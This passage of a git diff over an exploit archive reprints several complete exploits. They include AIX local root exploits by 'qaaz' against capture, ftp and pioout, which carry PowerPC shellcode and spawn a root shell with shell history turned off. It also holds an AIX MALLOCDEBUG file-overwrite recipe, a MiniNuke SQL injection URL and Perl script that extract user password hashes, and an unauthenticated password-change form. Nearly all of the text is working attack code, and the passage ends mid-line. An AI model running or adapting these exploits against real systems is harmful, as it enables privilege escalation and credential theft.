FD_ZERO(&rset); - FD_SET(p1[0], &rset); - FD_SET(p2[0], &rset); - - n = select(MAX(p1[0], p2[0]) + 1, - &rset, NULL, NULL, NULL); - if (n < 0) { - perror("[-] select"); - break; - } - - if (FD_ISSET(p1[0], &rset)) { - n = read(p1[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p1[1], buf, n); - } - if (FD_ISSET(p2[0], &rset)) { - n = read(p2[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p2[1], buf, n); - } - } -} - -/* just because you don't understand it doesn't mean it has to be wrong */ -ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) -{ - ulong top, len, off; - int i; - - len = 0; - for (i = 0; argv[i]; i++) - len += strlen(argv[i]) + 1; - for (i = 0; envp[i]; i++) - len += strlen(envp[i]) + 1; - top = (ulong) argv[0] + ALIGN(len, 8); - - len = off = 0; - for (i = 0; args[i]; i++) - len += strlen(args[i]) + 1; - for (i = 0; envs[i]; i++) { - if (!strncmp(envs[i], "EGG=", 4)) - off = len + 4; - len += strlen(envs[i]) + 1; - } - while (off & 3) - strcat(envs[0], 
"X"), off++, len++; - - return top - ALIGN(len, 4) + off; -} - -int main(int argc, char *argv[], char *envp[]) -{ - char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; - char *args[] = { TARGET, "/dev/null", NULL }; - char *envs[] = { pad, bsh, egg, NULL }; - int ptm, pts, pi[2]; - pid_t child; - ulong addr; - - sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); - sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); - addr = get_addr(argv, envp, args, envs); - - if (!envp[0]) { - dup2(3, 0); - - setuid(geteuid()); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - execl("/bin/sh", "sh", "-i", NULL); - perror("[-] execl"); - exit(1); - } else if (argc && !strcmp(argv[0], "bsh")) { - char i, ch; - - printf("\x1b["); - for (i = 0; i < VALCNT; i++) - printf("%lu;", addr); - printf("0A\n"); - fflush(stdout); - - while (read(0, &ch, 1) == 1) - write(1, &ch, 1); - exit(0); - } - - printf("--------------------------------\n"); - printf(" AIX capture Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("--------------------------------\n"); - - if (pipe(pi) < 0) { - perror("[-] pipe"); - exit(1); - } - - if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || - (pts = open(ttyname(ptm), O_RDWR)) < 0) { - perror("[-] pty"); - exit(1); - } - - if ((child = fork()) < 0) { - perror("[-] fork"); - exit(1); - } - - if (child == 0) { - dup2(pts, 0); - dup2(pts, 1); - dup2(pts, 2); - - dup2(pi[0], 3); - - execve(TARGET, args, envs); - perror("[-] execve"); - exit(1); - } - - close(pi[0]); - close(pts); - - sleep(1); - read(ptm, buf, sizeof(buf)); - - write(ptm, " ", 1); - shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); - kill(child, SIGTERM); - waitpid(child, NULL, 0); - return 0; -} - -// milw0rm.com [2007-07-27] +/* 07/2007: public release + * IBM AIX <= 5.3 sp6 + * + * AIX capture Local Root Exploit + * By qaaz + */ +#include +#include +#include + +#include +#include +#include +#include + +#define TARGET "/usr/bin/capture" +#define VALCNT 
40 + +#define MAX(x,y) ((x) > (y) ? (x) : (y)) +#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) + +unsigned char qaazcode[] = +"\x60\x60\x60\x60\x60\x60\x60\x60" +"\x7c\x63\x1a\x79\x40\x82\xff\xfd" +"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" +"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" +"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" +"\x44\xff\xff\x02\x38\x75\xff\x5f" +"\x38\x63\x01\x01\x88\x95\xff\x5d" +"\x38\x63\x01\x02\x38\x63\xfe\xff" +"\x88\xa3\xfe\xff\x7c\x04\x28\x40" +"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" +"\x98\xa3\xfe\xff\x88\x55\xff\x5c" +"\x38\x75\xff\x5f\x38\x81\xff\xf8" +"\x90\x61\xff\xf8\x90\xa1\xff\xfc" +"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; + +void shell(int p1[2], int p2[2]) +{ + ssize_t n; + fd_set rset; + char buf[4096]; + + for (;;) { + FD_ZERO(&rset); + FD_SET(p1[0], &rset); + FD_SET(p2[0], &rset); + + n = select(MAX(p1[0], p2[0]) + 1, + &rset, NULL, NULL, NULL); + if (n < 0) { + perror("[-] select"); + break; + } + + if (FD_ISSET(p1[0], &rset)) { + n = read(p1[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p1[1], buf, n); + } + if (FD_ISSET(p2[0], &rset)) { + n = read(p2[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p2[1], buf, n); + } + } +} + +/* just because you don't understand it doesn't mean it has to be wrong */ +ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) +{ + ulong top, len, off; + int i; + + len = 0; + for (i = 0; argv[i]; i++) + len += strlen(argv[i]) + 1; + for (i = 0; envp[i]; i++) + len += strlen(envp[i]) + 1; + top = (ulong) argv[0] + ALIGN(len, 8); + + len = off = 0; + for (i = 0; args[i]; i++) + len += strlen(args[i]) + 1; + for (i = 0; envs[i]; i++) { + if (!strncmp(envs[i], "EGG=", 4)) + off = len + 4; + len += strlen(envs[i]) + 1; + } + while (off & 3) + strcat(envs[0], "X"), off++, len++; + + return top - ALIGN(len, 4) + off; +} + +int main(int argc, char *argv[], char *envp[]) +{ + char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024]; + char *args[] = { TARGET, "/dev/null", NULL }; + char *envs[] = { pad, bsh, egg, 
NULL }; + int ptm, pts, pi[2]; + pid_t child; + ulong addr; + + sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); + sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid()); + addr = get_addr(argv, envp, args, envs); + + if (!envp[0]) { + dup2(3, 0); + + setuid(geteuid()); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + execl("/bin/sh", "sh", "-i", NULL); + perror("[-] execl"); + exit(1); + } else if (argc && !strcmp(argv[0], "bsh")) { + char i, ch; + + printf("\x1b["); + for (i = 0; i < VALCNT; i++) + printf("%lu;", addr); + printf("0A\n"); + fflush(stdout); + + while (read(0, &ch, 1) == 1) + write(1, &ch, 1); + exit(0); + } + + printf("--------------------------------\n"); + printf(" AIX capture Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("--------------------------------\n"); + + if (pipe(pi) < 0) { + perror("[-] pipe"); + exit(1); + } + + if ((ptm = open("/dev/ptc", O_RDWR)) < 0 || + (pts = open(ttyname(ptm), O_RDWR)) < 0) { + perror("[-] pty"); + exit(1); + } + + if ((child = fork()) < 0) { + perror("[-] fork"); + exit(1); + } + + if (child == 0) { + dup2(pts, 0); + dup2(pts, 1); + dup2(pts, 2); + + dup2(pi[0], 3); + + execve(TARGET, args, envs); + perror("[-] execve"); + exit(1); + } + + close(pi[0]); + close(pts); + + sleep(1); + read(ptm, buf, sizeof(buf)); + + write(ptm, " ", 1); + shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 }); + kill(child, SIGTERM); + waitpid(child, NULL, 0); + return 0; +} + +// milw0rm.com [2007-07-27] diff --git a/platforms/aix/local/4232.sh b/platforms/aix/local/4232.sh index 66b796a69..39717685f 100755 --- a/platforms/aix/local/4232.sh +++ b/platforms/aix/local/4232.sh 
@@ -1,29 +1,29 @@ -#!/bin/sh -# -# 07/2007: public release -# IBM AIX <= 5.3 sp6 -# -echo "-------------------------------" -echo " AIX pioout Local Root Exploit " -echo " By qaaz" -echo "-------------------------------" -cat >piolib.c <<_EOF_ -#include -#include -void init() __attribute__ ((constructor)); -void init() -{ - seteuid(0); - setuid(0); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", (void *) 0); - execl("/bin/sh", "sh", "-i", (void *) 0); - perror("execl"); - exit(1); -} -_EOF_ -gcc piolib.c -o piolib -shared -fPIC -[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib -rm -f piolib.c piolib - -# milw0rm.com [2007-07-27] +#!/bin/sh +# +# 07/2007: public release +# IBM AIX <= 5.3 sp6 +# +echo "-------------------------------" +echo " AIX pioout Local Root Exploit " +echo " By qaaz" +echo "-------------------------------" +cat >piolib.c <<_EOF_ +#include +#include +void init() __attribute__ ((constructor)); +void init() +{ + seteuid(0); + setuid(0); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", (void *) 0); + execl("/bin/sh", "sh", "-i", (void *) 0); + perror("execl"); + exit(1); +} +_EOF_ +gcc piolib.c -o piolib -shared -fPIC +[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib +rm -f piolib.c piolib + +# milw0rm.com [2007-07-27] diff --git a/platforms/aix/local/4233.c b/platforms/aix/local/4233.c index 751e2e04a..cb2417c56 100755 --- a/platforms/aix/local/4233.c +++ b/platforms/aix/local/4233.c 
@@ -1,157 +1,157 @@ -/* 07/2007: public release - * IBM AIX <= 5.3 sp6 - * - * AIX ftp Local Root Exploit - * By qaaz - */ -#include -#include -#include - -#include -#include -#include - -#define TARGET "/usr/bin/ftp" -#define OVERLEN 300 - -#define MAX(x,y) ((x) > (y) ? (x) : (y)) -#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) - -unsigned char qaazcode[] = -"\x60\x60\x60\x60\x60\x60\x60\x60" -"\x7c\x63\x1a\x79\x40\x82\xff\xfd" -"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" -"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" -"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" -"\x44\xff\xff\x02\x38\x75\xff\x5f" -"\x38\x63\x01\x01\x88\x95\xff\x5d" -"\x38\x63\x01\x02\x38\x63\xfe\xff" -"\x88\xa3\xfe\xff\x7c\x04\x28\x40" -"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" -"\x98\xa3\xfe\xff\x88\x55\xff\x5c" -"\x38\x75\xff\x5f\x38\x81\xff\xf8" -"\x90\x61\xff\xf8\x90\xa1\xff\xfc" -"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; - -void shell(int p1[2], int p2[2]) -{ - ssize_t n; - fd_set rset; - char buf[4096]; - - for (;;) { - FD_ZERO(&rset); - FD_SET(p1[0], &rset); - FD_SET(p2[0], &rset); - - n = select(MAX(p1[0], p2[0]) + 1, - &rset, NULL, NULL, NULL); - if (n < 0) { - perror("[-] select"); - break; - } - - if (FD_ISSET(p1[0], &rset)) { - n = read(p1[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p1[1], buf, n); - } - if (FD_ISSET(p2[0], &rset)) { - n = read(p2[0], buf, sizeof(buf)); - if (n <= 0) break; - write(p2[1], buf, n); - } - } -} - -/* just because you don't understand it doesn't mean it has to be wrong */ -ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) -{ - ulong top, len, off; - int i; - - len = 0; - for (i = 0; argv[i]; i++) - len += strlen(argv[i]) + 1; - for (i = 0; envp[i]; i++) - len += strlen(envp[i]) + 1; - top = (ulong) argv[0] + ALIGN(len, 8); - - len = off = 0; - for (i = 0; args[i]; i++) - len += strlen(args[i]) + 1; - for (i = 0; envs[i]; i++) { - if (!strncmp(envs[i], "EGG=", 4)) - off = len + 4; - len += strlen(envs[i]) + 1; - } - while (off & 3) - strcat(envs[0], "X"), off++, 
len++; - - return top - ALIGN(len, 4) + off; -} - -int main(int argc, char *argv[], char *envp[]) -{ - char pad[16] = "PAD=X", egg[512]; - char *args[] = { TARGET, NULL }; - char *envs[] = { pad, egg, NULL }; - int pi[2], po[2], i; - pid_t child; - ulong addr; - - sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); - - if (!envp[0]) { - setuid(geteuid()); - putenv("HISTFILE=/dev/null"); - execl("/bin/bash", "bash", "-i", NULL); - execl("/bin/sh", "sh", "-i", NULL); - perror("[-] execl"); - exit(1); - } - - printf("----------------------------\n"); - printf(" AIX ftp Local Root Exploit\n"); - printf(" By qaaz\n"); - printf("----------------------------\n"); - - if (pipe(pi) < 0 || pipe(po) < 0) { - perror("[-] pipe"); - exit(1); - } - - addr = get_addr(argv, envp, args, envs); - - if ((child = fork()) < 0) { - perror("[-] fork"); - exit(1); - } - - if (child == 0) { - dup2(pi[0], 0); - dup2(po[1], 1); - dup2(po[1], 2); - execve(TARGET, args, envs); - perror("[-] execve"); - exit(1); - } - - write(pi[1], "macdef foo\n\n$\nfoo ab", 20); - for (i = 0; i < OVERLEN; i += sizeof(addr)) - write(pi[1], &addr, sizeof(addr)); - write(pi[1], "\n", 1); - - fflush(stdout); - fflush(stderr); - - close(pi[0]); - close(po[1]); - shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); - kill(child, SIGTERM); - waitpid(child, NULL, 0); - return 0; -} - -// milw0rm.com [2007-07-27] +/* 07/2007: public release + * IBM AIX <= 5.3 sp6 + * + * AIX ftp Local Root Exploit + * By qaaz + */ +#include +#include +#include + +#include +#include +#include + +#define TARGET "/usr/bin/ftp" +#define OVERLEN 300 + +#define MAX(x,y) ((x) > (y) ? 
(x) : (y)) +#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y)) + +unsigned char qaazcode[] = +"\x60\x60\x60\x60\x60\x60\x60\x60" +"\x7c\x63\x1a\x79\x40\x82\xff\xfd" +"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01" +"\x88\x55\xff\x5b\x3a\xd5\xff\x1b" +"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42" +"\x44\xff\xff\x02\x38\x75\xff\x5f" +"\x38\x63\x01\x01\x88\x95\xff\x5d" +"\x38\x63\x01\x02\x38\x63\xfe\xff" +"\x88\xa3\xfe\xff\x7c\x04\x28\x40" +"\x40\x82\xff\xf0\x7c\xa5\x2a\x78" +"\x98\xa3\xfe\xff\x88\x55\xff\x5c" +"\x38\x75\xff\x5f\x38\x81\xff\xf8" +"\x90\x61\xff\xf8\x90\xa1\xff\xfc" +"\x4b\xff\xff\xbd\xb8\x05\x7c\xff"; + +void shell(int p1[2], int p2[2]) +{ + ssize_t n; + fd_set rset; + char buf[4096]; + + for (;;) { + FD_ZERO(&rset); + FD_SET(p1[0], &rset); + FD_SET(p2[0], &rset); + + n = select(MAX(p1[0], p2[0]) + 1, + &rset, NULL, NULL, NULL); + if (n < 0) { + perror("[-] select"); + break; + } + + if (FD_ISSET(p1[0], &rset)) { + n = read(p1[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p1[1], buf, n); + } + if (FD_ISSET(p2[0], &rset)) { + n = read(p2[0], buf, sizeof(buf)); + if (n <= 0) break; + write(p2[1], buf, n); + } + } +} + +/* just because you don't understand it doesn't mean it has to be wrong */ +ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[]) +{ + ulong top, len, off; + int i; + + len = 0; + for (i = 0; argv[i]; i++) + len += strlen(argv[i]) + 1; + for (i = 0; envp[i]; i++) + len += strlen(envp[i]) + 1; + top = (ulong) argv[0] + ALIGN(len, 8); + + len = off = 0; + for (i = 0; args[i]; i++) + len += strlen(args[i]) + 1; + for (i = 0; envs[i]; i++) { + if (!strncmp(envs[i], "EGG=", 4)) + off = len + 4; + len += strlen(envs[i]) + 1; + } + while (off & 3) + strcat(envs[0], "X"), off++, len++; + + return top - ALIGN(len, 4) + off; +} + +int main(int argc, char *argv[], char *envp[]) +{ + char pad[16] = "PAD=X", egg[512]; + char *args[] = { TARGET, NULL }; + char *envs[] = { pad, egg, NULL }; + int pi[2], po[2], i; + pid_t child; + ulong addr; + + 
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid()); + + if (!envp[0]) { + setuid(geteuid()); + putenv("HISTFILE=/dev/null"); + execl("/bin/bash", "bash", "-i", NULL); + execl("/bin/sh", "sh", "-i", NULL); + perror("[-] execl"); + exit(1); + } + + printf("----------------------------\n"); + printf(" AIX ftp Local Root Exploit\n"); + printf(" By qaaz\n"); + printf("----------------------------\n"); + + if (pipe(pi) < 0 || pipe(po) < 0) { + perror("[-] pipe"); + exit(1); + } + + addr = get_addr(argv, envp, args, envs); + + if ((child = fork()) < 0) { + perror("[-] fork"); + exit(1); + } + + if (child == 0) { + dup2(pi[0], 0); + dup2(po[1], 1); + dup2(po[1], 2); + execve(TARGET, args, envs); + perror("[-] execve"); + exit(1); + } + + write(pi[1], "macdef foo\n\n$\nfoo ab", 20); + for (i = 0; i < OVERLEN; i += sizeof(addr)) + write(pi[1], &addr, sizeof(addr)); + write(pi[1], "\n", 1); + + fflush(stdout); + fflush(stderr); + + close(pi[0]); + close(po[1]); + shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 }); + kill(child, SIGTERM); + waitpid(child, NULL, 0); + return 0; +} + +// milw0rm.com [2007-07-27] diff --git a/platforms/aix/local/898.sh b/platforms/aix/local/898.sh index ad79b9640..b76b107ff 100755 --- a/platforms/aix/local/898.sh +++ b/platforms/aix/local/898.sh @@ -20,6 +20,6 @@ export PATH /usr/sbin/invscout PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./" export PATH -exec /tmp/ksh - -# milw0rm.com [2005-03-25] +exec /tmp/ksh + +# milw0rm.com [2005-03-25] diff --git a/platforms/aix/local/9306.txt b/platforms/aix/local/9306.txt index c8c6189c6..b4b0193b2 100755 --- a/platforms/aix/local/9306.txt +++ b/platforms/aix/local/9306.txt 
@@ -1,33 +1,33 @@ -#!/bin/bash -################################################################# -# _______ _________ _ # -# ( ____ )\__ __/( ( /| # -# | ( )| ) ( | \ ( | # -# | (____)| | | | \ | | # -# | __) | | | (\ \) | # -# | (\ ( | | | | \ | # -# | ) \ \__ | | | ) \ | # -# |/ \__/ )_( |/ )_) # -# http://root-the.net # -################################################################# -#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # -#[+] Refer : securitytracker.com/id?1022261 # -#[+] Exploit : Affix # -#[+] Tested on : IBM AIX # -#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # -# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # -# AIX 5.3 ML 5 is where this bad libc code was added. # -# Libs Affected : # -# /usr/ccs/lib/libc.a # -# /usr/ccs/lib/libp/libc.a # -################################################################# - -Set the following environment variables: - -umask 000 -MALLOCTYPE=debug -MALLOCDEBUG=report_allocations,output:/bin/filename - -echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." - -# milw0rm.com [2009-07-30] +#!/bin/bash +################################################################# +# _______ _________ _ # +# ( ____ )\__ __/( ( /| # +# | ( )| ) ( | \ ( | # +# | (____)| | | | \ | | # +# | __) | | | (\ \) | # +# | (\ ( | | | | \ | # +# | ) \ \__ | | | ) \ | # +# |/ \__/ )_( |/ )_) # +# http://root-the.net # +################################################################# +#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability # +#[+] Refer : securitytracker.com/id?1022261 # +#[+] Exploit : Affix # +#[+] Tested on : IBM AIX # +#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, # +# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull # +# AIX 5.3 ML 5 is where this bad libc code was added. 
# +# Libs Affected : # +# /usr/ccs/lib/libc.a # +# /usr/ccs/lib/libp/libc.a # +################################################################# + +Set the following environment variables: + +umask 000 +MALLOCTYPE=debug +MALLOCDEBUG=report_allocations,output:/bin/filename + +echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions." + +# milw0rm.com [2009-07-30] diff --git a/platforms/aix/shellcode/13241.txt b/platforms/aix/shellcode/13241.txt index 19c3a7671..269dd6baa 100755 --- a/platforms/aix/shellcode/13241.txt +++ b/platforms/aix/shellcode/13241.txt @@ -35,6 +35,6 @@ unsigned int code[]={ 80010444 lwz r0,1092(SP) --jump 7c0903a6 mtspr CTR,r0 4e800420 bctr --jump -*/ - +*/ + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/asp/webapps/1010.pl b/platforms/asp/webapps/1010.pl index 613ef085f..7c4b2f3ee 100755 --- a/platforms/asp/webapps/1010.pl +++ b/platforms/asp/webapps/1010.pl @@ -71,6 +71,6 @@ print "User: admin\n"; print "Pass: trapset\n\n"; print "Enjoy ;)\n"; print "\n"; -### EOF ### - -# milw0rm.com [2005-05-26] +### EOF ### + +# milw0rm.com [2005-05-26] diff --git a/platforms/asp/webapps/1011.php b/platforms/asp/webapps/1011.php index 6dab56606..807294640 100755 --- a/platforms/asp/webapps/1011.php +++ b/platforms/asp/webapps/1011.php @@ -30,6 +30,6 @@ print "Member key: "; print ""; } -?> - -# milw0rm.com [2005-05-26] +?> + +# milw0rm.com [2005-05-26] diff --git a/platforms/asp/webapps/1012.txt b/platforms/asp/webapps/1012.txt index c83b4b5c9..0dddbffbe 100755 --- a/platforms/asp/webapps/1012.txt +++ b/platforms/asp/webapps/1012.txt @@ -33,6 +33,6 @@ size="150">
------------------End------------------- - -# milw0rm.com [2005-05-26] +-----------------End------------------- + +# milw0rm.com [2005-05-26] diff --git a/platforms/asp/webapps/1015.txt b/platforms/asp/webapps/1015.txt index 14214c22a..e37103833 100755 --- a/platforms/asp/webapps/1015.txt +++ b/platforms/asp/webapps/1015.txt @@ -32,6 +32,6 @@ firstname : - -# milw0rm.com [2005-05-27] +Now u can use forgot password to gain passwords! --> + +# milw0rm.com [2005-05-27] diff --git a/platforms/asp/webapps/1070.pl b/platforms/asp/webapps/1070.pl index 0a5d072e9..b33dbb7d8 100755 --- a/platforms/asp/webapps/1070.pl +++ b/platforms/asp/webapps/1070.pl @@ -47,6 +47,6 @@ print "Wait For Changing Password ...\n"; print "[+]OK , Now Login With : \n"; print "Username: trapset\n"; print "Password: trapset\n\n"; - - -# milw0rm.com [2005-06-27] + + +# milw0rm.com [2005-06-27] diff --git a/platforms/asp/webapps/1071.pl b/platforms/asp/webapps/1071.pl index 0630ce2e7..0a8454fdf 100755 --- a/platforms/asp/webapps/1071.pl +++ b/platforms/asp/webapps/1071.pl @@ -23,6 +23,6 @@ $page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin print "[-] Unable to retrieve Username\n" if(!$1); $page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!"; $page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n"; -print "[-] Unable to retrieve hash of password\n" if(!$1); - -# milw0rm.com [2005-06-27] +print "[-] Unable to retrieve hash of password\n" if(!$1); + +# milw0rm.com [2005-06-27] diff --git a/platforms/asp/webapps/1112.txt b/platforms/asp/webapps/1112.txt index 44ac9e4aa..0e2bb353f 100755 --- a/platforms/asp/webapps/1112.txt +++ b/platforms/asp/webapps/1112.txt @@ -104,6 +104,6 @@ hostcustid: - - -# milw0rm.com [2005-07-18] + + +# milw0rm.com [2005-07-18] diff --git a/platforms/asp/webapps/1252.htm b/platforms/asp/webapps/1252.htm index 493ba208f..d53aac828 100755 
--- a/platforms/asp/webapps/1252.htm +++ b/platforms/asp/webapps/1252.htm @@ -1,44 +1,44 @@ - - - -
- - - - -
- - -# milw0rm.com [2005-10-15] + + + +
+ + + + +
+ + +# milw0rm.com [2005-10-15] diff --git a/platforms/asp/webapps/1418.txt b/platforms/asp/webapps/1418.txt index 7019f0a86..e5de32e2d 100755 --- a/platforms/asp/webapps/1418.txt +++ b/platforms/asp/webapps/1418.txt @@ -1,59 +1,59 @@ -Contacts:{ -ICQ: 10072 -MSN/Email: nukedx@nukedx.com -Web: http://www.nukedx.com -} - - ---- -Vendor: MiniNuke (www.miniex.net) -Version: 1.8.2 and prior versions must be affected. -About:Via this method remote attacker can inject SQL query to the news.asp ---- -How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] -http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 - -Columns of MEMBERS: -uye_id = userid -sifre = md5 password hash -g_soru = secret question. -g_cevap = secret answer -email = mail address -isim = name -icq = ICQ Uin -msn = MSN Sn. -aim = AIM Sn. -meslek = job -cinsiyet = gender -yas = age -url = url -imza = signature -mail_goster = show mail :P -avurl = avatar url -avatar = avatar - - ---- -Vendor: MiniNuke (www.miniex.net) -Version: 1.8.2 and prior versions must be affected. -About:Via this method remote attacker can change any users password without login. ---- -How&Example: -HTML Example -[code] - -MiniNuke <= 1.8.2 remote user password change -
- - - - - - - -
Now fill in the blanks
Change password
PASSWORD:
PASSWORD Again :    -
- -[/code] - -# milw0rm.com [2006-01-14] +Contacts:{ +ICQ: 10072 +MSN/Email: nukedx@nukedx.com +Web: http://www.nukedx.com +} + + +--- +Vendor: MiniNuke (www.miniex.net) +Version: 1.8.2 and prior versions must be affected. +About:Via this method remote attacker can inject SQL query to the news.asp +--- +How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery] +http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52 + +Columns of MEMBERS: +uye_id = userid +sifre = md5 password hash +g_soru = secret question. +g_cevap = secret answer +email = mail address +isim = name +icq = ICQ Uin +msn = MSN Sn. +aim = AIM Sn. +meslek = job +cinsiyet = gender +yas = age +url = url +imza = signature +mail_goster = show mail :P +avurl = avatar url +avatar = avatar + + +--- +Vendor: MiniNuke (www.miniex.net) +Version: 1.8.2 and prior versions must be affected. +About:Via this method remote attacker can change any users password without login. +--- +How&Example: +HTML Example +[code] + +MiniNuke <= 1.8.2 remote user password change +
+ + + + + + + +
Now fill in the blanks
Change password
PASSWORD:
PASSWORD Again :    +
+ +[/code] + +# milw0rm.com [2006-01-14] diff --git a/platforms/asp/webapps/1419.pl b/platforms/asp/webapps/1419.pl index 18d013c30..1d8236afb 100755 --- a/platforms/asp/webapps/1419.pl +++ b/platforms/asp/webapps/1419.pl 
@@ -1,53 +1,53 @@ -#!/usr/bin/perl - -# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit. -# This exploit uses the vulnerability discovered by nukedx@nukedx.com. -# Exploit uses SQl-injection to give you the hash from user with chosen id. -# DetMyl, 2006 Detmyl@bk.ru - -use IO::Socket; - -if (@ARGV < 3) - { - print q( - +++++++++++++++++++++++++++++++++++++++++++++++++++ - Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] - i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128 - ++++++++++++++++++++++++++++++++++++++++++++++++++++ - ); - exit; - } -$serv = $ARGV[0]; -$dir = $ARGV[1]; -$uid = $ARGV[2]; -$proxy = $ARGV[3]; - -print "----------------------------------\n"; -if ( defined $proxy) { - $proxy =~ s/(http:\/\/)//eg; - ($proxyAddr,$proxyPort) = split(/:/, $proxy); - } -$serv =~ s/(http:\/\/)//eg; -$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid; -print "Connecting to: $serv...\n"; -print $proxy?"Using proxy: $proxy \n":""; -$socket = IO::Socket::INET->new( Proto => "tcp", - PeerAddr => $proxyAddr?"$proxyAddr":"$serv", - PeerPort => $proxyPort?"$proxyPort":"80") - || die "can't connect to: $serv\n"; -print $socket "GET $request HTTP/1.1\n"; -print $socket "Host: $serv\n"; -print $socket "Accept: */*\n"; -print $socket "Connection: close\n\n"; -print "+ Connected!...\n"; - while($answer = <$socket>) { - if ($answer =~ /([\d,a-f]{32})<\/b>/) { - print "+ Found! The hash for user $uid: $1\n"; - print "----------------------------------\n"; - exit(); } - if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); } - } -print "Exploit failed\n"; -print "--------------------------\n"; - -# milw0rm.com [2006-01-14] +#!/usr/bin/perl + +# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit. 
+# This exploit uses the vulnerability discovered by nukedx@nukedx.com. +# Exploit uses SQl-injection to give you the hash from user with chosen id. +# DetMyl, 2006 Detmyl@bk.ru + +use IO::Socket; + +if (@ARGV < 3) + { + print q( + +++++++++++++++++++++++++++++++++++++++++++++++++++ + Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)] + i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128 + ++++++++++++++++++++++++++++++++++++++++++++++++++++ + ); + exit; + } +$serv = $ARGV[0]; +$dir = $ARGV[1]; +$uid = $ARGV[2]; +$proxy = $ARGV[3]; + +print "----------------------------------\n"; +if ( defined $proxy) { + $proxy =~ s/(http:\/\/)//eg; + ($proxyAddr,$proxyPort) = split(/:/, $proxy); + } +$serv =~ s/(http:\/\/)//eg; +$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid; +print "Connecting to: $serv...\n"; +print $proxy?"Using proxy: $proxy \n":""; +$socket = IO::Socket::INET->new( Proto => "tcp", + PeerAddr => $proxyAddr?"$proxyAddr":"$serv", + PeerPort => $proxyPort?"$proxyPort":"80") + || die "can't connect to: $serv\n"; +print $socket "GET $request HTTP/1.1\n"; +print $socket "Host: $serv\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; +print "+ Connected!...\n"; + while($answer = <$socket>) { + if ($answer =~ /([\d,a-f]{32})<\/b>/) { + print "+ Found! The hash for user $uid: $1\n"; + print "----------------------------------\n"; + exit(); } + if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with 